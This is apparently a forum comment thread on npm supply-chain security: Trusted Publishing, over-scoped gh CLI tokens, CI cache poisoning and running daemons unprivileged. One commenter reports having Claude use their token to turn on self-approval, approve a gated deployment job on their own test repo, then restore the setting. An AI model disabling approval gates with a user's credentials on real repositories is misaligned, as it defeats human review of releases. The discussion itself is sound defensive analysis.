However, the threat I'm most afraid of still does involve dev environment compromise. Because if your repo admin gets their token stolen from their gh cli, they can trivially undo via API (without a 2fa gate!) any github-level gate you have put in place to make TP safe. I want so badly to be wrong about that; we have been evaluating TP in my projects and I want to use it. But without a second factor to promote a release, at the end of the day if you have TP configured and your repo admin gets pwned, you cannot stop a TP release unless you race their publish and disable TP at npm.
TP is amazing at removing long-lived npm tokens from CI, but the class of compromise that historically has plagued the ecosystem does not at all depend on the token being long-lived; it depends on an attacker getting a token which doesn't require 2fa.
I am begging for someone to prove me wrong about this, not to be a shit, but because I really want to find a secure way to use TP in lodash, express, body-parser, cors, etc
Make sure to have an up-to-date backup, that's offline, or at least not mounted on the affected computer.
Check for the dead-man switch, and if present, disarm it.
Only then revoke the tokens. Instead of immediately revoking the tokens, like one would normally do. Nobody is suggesting to keep the compromised tokens active longer than necessary.
It should be that within the first X hours you can pull a version regardless of dependants, after that you should need approval.
GitLab just adds a -protected suffix to the cache key.
It seems baffling that GitHub does not do this trivial separation, if I understand it correctly.
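In .gitlab-ci.yml terms this is invisible to the user; a sketch (the suffixing is done by GitLab itself, not by anything you write):

cache:
  key: pnpm-store   # unprotected pipelines use "pnpm-store";
                    # protected-ref pipelines effectively use "pnpm-store-protected"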
I ditched npm for yarn years ago because it had saner dependency resolution (npm's peer dependency algorithm was a constantly moving target), and now I've switched from yarn to bun because it doesn't run hooks in dependencies by default. It also helps that it installs dependencies 10x faster.
I don't read it in detail because reading in detail is precisely what I delegate to the harness. The alternative is that I delegate all this trust to package managers and the maintainers which quite clearly is a bad idea.
Whether the $$ pricetag is worth it is.. relative. Also in Go you don't update all that often, really when something either breaks or there is a legitimate security reason to do so, which in deep systems software is quite infrequent.
Funnily enough for frontend NPM code our policy was to never ever upgrade and run with locked dependencies, running few years old JS deps. For internal dashboards it was perfectly fine, never missed a feature and never had a supply chain close call.
If your unprivileged user is compromised, you are pretty hosed.
I'm in agreement that a second factor would be ideal, to be clear. I think it's a good idea, something like "package is released with Trusted Publishing, then 'marked' via a 2FA attestation". But in theory that 2FA is supposed to be necessary anyways since you can require a 2FA on Github and then require approvals on PRs - hence the cache poisoning being required.
Nothing in this link [1] proves what I said, but it is the test repo I was just conducting this on, and it was an approval gated GHA job that I had claude approve using my GH cli token
I also had claude use the same token to first reconfigure the environment to enable self-approves (I had configured it off manually before testing). It also put it back to self-approve disabled when it was done hehe
[1] https://github.com/jonchurch/deploy-env-test/actions/runs/25...
These types of features are not worth it and need to be removed from the marketplace.
At least not if you haven’t edited your package.json manually.
This is an area where documentation is necessary but not sufficient. Github needs to add some form of automated screening mechanism to either prevent this usage, or at the very least quickly flag usages that might be dangerous.
What do you do when a critical vulnerability gets discovered and you have to update a package? How many critical/high severity vulnerabilities are you running with in production every day to avoid supply chain attacks?
Honestly, the Android approach is significantly better. (and for that, see Micay's various ramblings posted online)
Yubikeys do not fix this issue.
There is no gate you can put on a Trusted Publisher setup in github which requires 2fa to remove. Full stop. 2fa on github gates some actions, but with a token with the right scope you can just disable the gating of workflow-runs-on-approve, branch protection, anything besides I think repo deletion and renaming.
And in my experience most maintainers will have repo admin perms by nature of the maintainer team being small and high trust. Your point is well taken, however, that said stolen token does need to have high enough privileges. But if you are the lead maintainer of your project, your gh token just comes with admin scope on your repo.
Many package managers require sudo, sure, but there is no good reason for them to in a modern linux system, and not all require this.
Even with systemd, you can use systemd --user.
You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.
It makes me think of another similar one: I've noticed that British English speakers will say e.g. "the new iPhone will be available from September 20th"
To my ears that sounds like it's missing an “onwards” after it (or “starting September 20th” would sound even more natural).
https://docs.github.com/en/rest/actions/workflow-runs?apiVer...
Also for a Pending Deployment: https://docs.github.com/en/rest/actions/workflow-runs#review...
Both of these need `repo` scope, which you can avoid giving on org-level repos. For fine-grained tokens: "Deployments" repository permissions (write) is needed, which I wouldn't usually give to a token.
Critical severity vulnerabilities are only critical when they are reachable, but are completely meaningless if your application doesn't touch that code at all. It's objectively more risky to "patch" those by updating dependencies than just let them be there.
What upthread is talking about is the Github CLI app, `gh`; it doesn't use fine-grained tokens, it uses OAuth app tokens. I.e., if you look at fine-grained tokens (Settings → Developer settings → Personal access tokens → Fine-grained tokens), you will not see anything corresponding to `gh` there, as it does not use that form of authentication. It is under Settings → Applications → Authorized OAuth Apps as "Github CLI".
I just ran through the login sequence to double-check, but the permissions you grant it are not configurable during the login sequence, and it requests an all-encompassing token, as the upthread suggests.
Another way to come at this is to look at the token itself: gh's token is prefixed with `gho_` (the prefix for such OAuth apps), and fine-grained tokens are prefixed with `github_pat_` (sic)¹
¹(PATs are prefixed with `ghp_`, though I guess fine-grained tokens are also sometimes called fine-grain PATs… so, maybe the prefix is sensible.)
setcap 'cap_net_bind_service=+ep' /usr/sbin/sshd
Could even run it as a daemon unprivileged from a home directory with "systemd --user"
That said if you have multiple users and want every user to have their own sshd reachable on port 22 on the same machine you probably want to listen on vhost namespaced unix sockets and have something like haproxy listen on port 22 instead. Haproxy could of course also run unprivileged provided it has read access to all the sockets.
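An illustrative user-scoped variant, assuming host keys and config are readable from the user's home directory:

systemd-run --user --unit=sshd-user \
  /usr/sbin/sshd -D -p 2222 -f "$HOME/.ssh/sshd_config"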
Issue is that it increases friction and you need sudo anyways to set the capabilities.
Most web servers would be happy to run unprivileged with only CAP_NET_BIND_SERVICE
The bigger issue is that if you want to install or update system-wide packages, many of those will be used by privileged processes. Suppose you want to update /bin/sh. Even if the only permission you had is to write binaries, that'll get you root.
The only things I tend to have running at the system level are a kernel and init and maybe openssh.